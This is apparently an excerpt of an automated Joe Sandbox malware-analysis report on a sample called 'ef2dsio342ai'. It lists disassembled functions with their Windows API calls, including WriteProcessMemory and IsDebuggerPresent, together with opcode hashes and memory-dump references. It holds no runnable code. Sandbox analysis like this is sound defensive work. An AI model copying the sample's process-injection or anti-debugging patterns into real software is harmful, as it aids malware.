                                                                                                      • Opcode Fuzzy Hash: c9bf6c1ae0cd87c47a76a94545576dbfa2fcd4038739583245f79c61ca19616d
                                                                                                      • Instruction Fuzzy Hash: 1CF01C3650010DFBDF018FD4DD029DE7FAAEF082A9F104154FA10A50A0E776DA60AB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • TranslateMessage.USER32(?), ref: 00D1F22B
                                                                                                      • DispatchMessageW.USER32(?), ref: 00D1F239
                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D1F24F
                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00D1F261
                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00D6327C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3288985973-0
                                                                                                      • Opcode ID: 8dc5a2542525f8f6211acac13be3bb5a73500120cf485dad564543202e01d781
                                                                                                      • Instruction ID: 52f2778e82ac6fcf4e527b992c01611db1391023c7dd0632928a53ef62fd3cdb
                                                                                                      • Opcode Fuzzy Hash: 8dc5a2542525f8f6211acac13be3bb5a73500120cf485dad564543202e01d781
                                                                                                      • Instruction Fuzzy Hash: 23F08230504381ABE7349B60EC89FEA73ADEF89314F004928F64AC75C0DB309588CB35
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 10006B30
                                                                                                        • Part of subcall function 10005652: __FF_MSGBANNER.LIBCMT ref: 10005669
                                                                                                        • Part of subcall function 10005652: __NMSG_WRITE.LIBCMT ref: 10005670
                                                                                                        • Part of subcall function 10005652: RtlAllocateHeap.NTDLL(01350000,00000000,00000001,00000001,?,?,?,10004E11,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 10005695
                                                                                                      • std::exception::exception.LIBCMT ref: 10006B4C
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10006B61
                                                                                                        • Part of subcall function 1000750B: RaiseException.KERNEL32(?,?,10004732,?,?,?,?,?,10004732,?,10020100,0000001C), ref: 1000755C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                      • String ID:
                                                                                                      • API String ID: 3074076210-0
                                                                                                      • Opcode ID: 0ebb55344c7898cec791d33270cf8a033bc60ff51b34521db957c1640e0221a4
                                                                                                      • Instruction ID: 4e096c2346167b5aa184c7d07bdaa7e800888b5dfe62eb1ab823ab07638d74b1
                                                                                                      • Opcode Fuzzy Hash: 0ebb55344c7898cec791d33270cf8a033bc60ff51b34521db957c1640e0221a4
                                                                                                      • Instruction Fuzzy Hash: 89E065B950060EEAEB00EB98CC21EDE7BA9FF043C0F504065F514E6095DB71D68096A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __Init_thread_footer.LIBCMT ref: 00D22FB6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer
                                                                                                      • String ID: CALL
                                                                                                      • API String ID: 1385522511-4196123274
                                                                                                      • Opcode ID: 1b50e577f5592f581f323d4d4418196430766d8cacdb73b8456abbce83879f55
                                                                                                      • Instruction ID: e4f291a2688e39bbe72440a2b126378db9323a1e159827e9ac6c10aadb2d407c
                                                                                                      • Opcode Fuzzy Hash: 1b50e577f5592f581f323d4d4418196430766d8cacdb73b8456abbce83879f55
                                                                                                      • Instruction Fuzzy Hash: 17228870608351AFC714DF14D490A2ABBE1FFA9318F18895DF49A8B362D771E941CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00D54115
                                                                                                        • Part of subcall function 00D1557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D15558,?,?,00D54B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00D1559E
                                                                                                        • Part of subcall function 00D139DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D139FD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                      • String ID: X
                                                                                                      • API String ID: 779396738-3081909835
                                                                                                      • Opcode ID: 3f80d9dcba7068a95c2b02ce54c33a2998ea1aa1e6628b87f24ad5af74b3ef01
                                                                                                      • Instruction ID: 31a50e08a63dccef65c1613323f695fdf22d62fc386986895cf26327ece55296
                                                                                                      • Opcode Fuzzy Hash: 3f80d9dcba7068a95c2b02ce54c33a2998ea1aa1e6628b87f24ad5af74b3ef01
                                                                                                      • Instruction Fuzzy Hash: A021A471A04258ABCF01DF94D805AEE7BFD9F49304F00405AE805A7341DFB89A898FB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D139C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: IconNotifyShell_
                                                                                                      • String ID:
                                                                                                      • API String ID: 1144537725-0
                                                                                                      • Opcode ID: b085b371ec919056c49c53b8fe1fe090adecbdaa263c5fcf52ceed50fd48c974
                                                                                                      • Instruction ID: 7c7b37801760e0dd13a029987c5649304d496786770bd9803d2f1461abd6dd99
                                                                                                      • Opcode Fuzzy Hash: b085b371ec919056c49c53b8fe1fe090adecbdaa263c5fcf52ceed50fd48c974
                                                                                                      • Instruction Fuzzy Hash: 413152705057419FD720DF24E8857A7BBE8FB49718F04092EE5DA87340DBB5A988CF62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsThemeActive.UXTHEME ref: 00D132C4
                                                                                                        • Part of subcall function 00D1326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D13282
                                                                                                        • Part of subcall function 00D1326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D13299
                                                                                                        • Part of subcall function 00D13312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00D132EF,?), ref: 00D13342
                                                                                                        • Part of subcall function 00D13312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00D132EF,?), ref: 00D13355
                                                                                                        • Part of subcall function 00D13312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00DE2418,00DE2400,?,?,?,?,?,?,00D132EF,?), ref: 00D133C1
                                                                                                        • Part of subcall function 00D13312: SetCurrentDirectoryW.KERNEL32(?,00000001,00DE2418,?,?,?,?,?,?,?,00D132EF,?), ref: 00D13442
                                                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00D132FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                      • String ID:
                                                                                                      • API String ID: 1550534281-0
                                                                                                      • Opcode ID: fb51a04f35ae5257b5799a9e413856276fbf25c394db6c1bf85388ddee1982ef
                                                                                                      • Instruction ID: 608896891a367efe236f71cdc849ba527f600d77e88f55472af3fd61f699f2cb
                                                                                                      • Opcode Fuzzy Hash: fb51a04f35ae5257b5799a9e413856276fbf25c394db6c1bf85388ddee1982ef
                                                                                                      • Instruction Fuzzy Hash: 82F05E71594384AFE300BFA0FC8ABB93BA8E705705F144809B519CE6E2DFB995908F34
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __Init_thread_footer.LIBCMT ref: 00D1CE8E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1385522511-0
                                                                                                      • Opcode ID: 2ad3fd7c0cff645e3845ff6cf0380150698697b1fa5211f814a6860ca9220ed9
                                                                                                      • Instruction ID: 7a53f982c479c0dc1ce126bb1a1b0951752d0498485a470221e7277282b93dad
                                                                                                      • Opcode Fuzzy Hash: 2ad3fd7c0cff645e3845ff6cf0380150698697b1fa5211f814a6860ca9220ed9
                                                                                                      • Instruction Fuzzy Hash: 9232AE79A44205AFCB20DF58D885EBAB7B6EF44314F1C8059E846AB351CB74ED81CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __Init_thread_footer.LIBCMT ref: 00D9628D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Init_thread_footer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1385522511-0
                                                                                                      • Opcode ID: aa12d6ecc100e8eac99d6b06a90e0ee96e0ae9dc9e269aca089dccc7e154d37d
                                                                                                      • Instruction ID: d370bc86b4c37b347e316adbdffbb5a5dc4712e15651a8fdd1a0bee681f98aff
                                                                                                      • Opcode Fuzzy Hash: aa12d6ecc100e8eac99d6b06a90e0ee96e0ae9dc9e269aca089dccc7e154d37d
                                                                                                      • Instruction Fuzzy Hash: BE718830A04215AFCF24DF98C8809BAB7B5FF58304F248069EA559B291D771ED95CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0a40a6c8837e55ef6cc303b1144fa1d6ff58c9a4991fc4851bb7578469b967a8
                                                                                                      • Instruction ID: 1dc1c852d5e362a086a0d77febb1388aa72a010e45aaa7cd60febd73491365f6
                                                                                                      • Opcode Fuzzy Hash: 0a40a6c8837e55ef6cc303b1144fa1d6ff58c9a4991fc4851bb7578469b967a8
                                                                                                      • Instruction Fuzzy Hash: 1851767AE0024CEFDB10DF58C841A6A7BA5EF85364F198164E848DB351C771DD42CBB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00D7FBE3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BuffCharLower
                                                                                                      • String ID:
                                                                                                      • API String ID: 2358735015-0
                                                                                                      • Opcode ID: ded831bbd1dec18c578377dd2593f92b101520bab8ba60f5e4b79d19ed69e720
                                                                                                      • Instruction ID: 94bc56f9b7c66e86132cdffacfd54ec86f88f0a9efac6e7cd307d06975e1ba38
                                                                                                      • Opcode Fuzzy Hash: ded831bbd1dec18c578377dd2593f92b101520bab8ba60f5e4b79d19ed69e720
                                                                                                      • Instruction Fuzzy Hash: C94193B2A00209AFCB21EF64D8819AA77B8EF44310F15853AE91AD7241EB70DA44CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WriteProcessMemory.KERNELBASE ref: 00D300AF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MemoryProcessWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3559483778-0
                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                      • Instruction ID: 2bca8be00f15881dd7d7f40408f53c343e3ba328eb750551ffe215cc5f7114bd
                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                      • Instruction Fuzzy Hash: 3D31D270A00105DFC718CF59C4A0A69FBA6FB59300F6886A5E44ACB356D732EDC1CBE0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fseek
                                                                                                      • String ID:
                                                                                                      • API String ID: 2937370855-0
                                                                                                      • Opcode ID: c42e6be2f4dd6041c1c2b93d88959b0dc8e3feb05ea96996ac077f009d3c503d
                                                                                                      • Instruction ID: 3416de8fb6ea9dd45652974d7294bef42df7b06ebd61e85a5e5bf5e51c0ae318
                                                                                                      • Opcode Fuzzy Hash: c42e6be2f4dd6041c1c2b93d88959b0dc8e3feb05ea96996ac077f009d3c503d
                                                                                                      • Instruction Fuzzy Hash: AC1136B2A006A666FB50C955CC01B6E36C9DF456D1F23C834FE49A205CEF20DC1283DD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D16332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D1637F,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D1633E
                                                                                                        • Part of subcall function 00D16332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D16350
                                                                                                        • Part of subcall function 00D16332: FreeLibrary.KERNEL32(00000000,?,?,00D1637F,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D16362
                                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D1639F
                                                                                                        • Part of subcall function 00D162FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D554C3,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D16304
                                                                                                        • Part of subcall function 00D162FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D16316
                                                                                                        • Part of subcall function 00D162FB: FreeLibrary.KERNEL32(00000000,?,?,00D554C3,?,?,00D160AA,?,00000001,?,?,00000000), ref: 00D16329
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2632591731-0
                                                                                                      • Opcode ID: bfe17f599cb161603454e82682e650e195bf01bcad2525672bbe4621dda83a36
                                                                                                      • Instruction ID: 52b66c819209715d38e9c620549637edde7b095adf7d468845fd3c3684dfede2
                                                                                                      • Opcode Fuzzy Hash: bfe17f599cb161603454e82682e650e195bf01bcad2525672bbe4621dda83a36
                                                                                                      • Instruction Fuzzy Hash: 7E110431600204BACF14BB30E802BED77A5DF50B11F548429F892A61C1DFB5DA859770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __wsopen_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 3347428461-0
                                                                                                      • Opcode ID: 67d60f72594c9aa4cdf6245816e5a9d608f9aece6793c62f6864ef88e22ff361
                                                                                                      • Instruction ID: f8846f500267c24f4f092757bfaa22024202c20545a45375c5f85c4a4d221e1f
                                                                                                      • Opcode Fuzzy Hash: 67d60f72594c9aa4cdf6245816e5a9d608f9aece6793c62f6864ef88e22ff361
                                                                                                      • Instruction Fuzzy Hash: 5811487590420AAFCF05DF58E940A9E7BF5EF48310F104069FC08AB311DA30EE119BB4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D133E9,00DE2418,?,?,?,?,?,?,?,00D132EF,?), ref: 00D14227
                                                                                                        • Part of subcall function 00D184B7: _wcslen.LIBCMT ref: 00D184CA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FullNamePath_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4019309064-0
                                                                                                      • Opcode ID: e3e8f9b54322b712d5dfaf5b569245803469e57423fda75b577a1c935a870fc9
                                                                                                      • Instruction ID: f0e0503de5aee7eb7ecc4a574a44afe3c8eecd716becb5733a14ab2dc21b6ef4
                                                                                                      • Opcode Fuzzy Hash: e3e8f9b54322b712d5dfaf5b569245803469e57423fda75b577a1c935a870fc9
                                                                                                      • Instruction Fuzzy Hash: 5811AD71604209BBCB40FBA4A842EED77EDEF18350B004065B985D7285DEB4E7C89B35
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
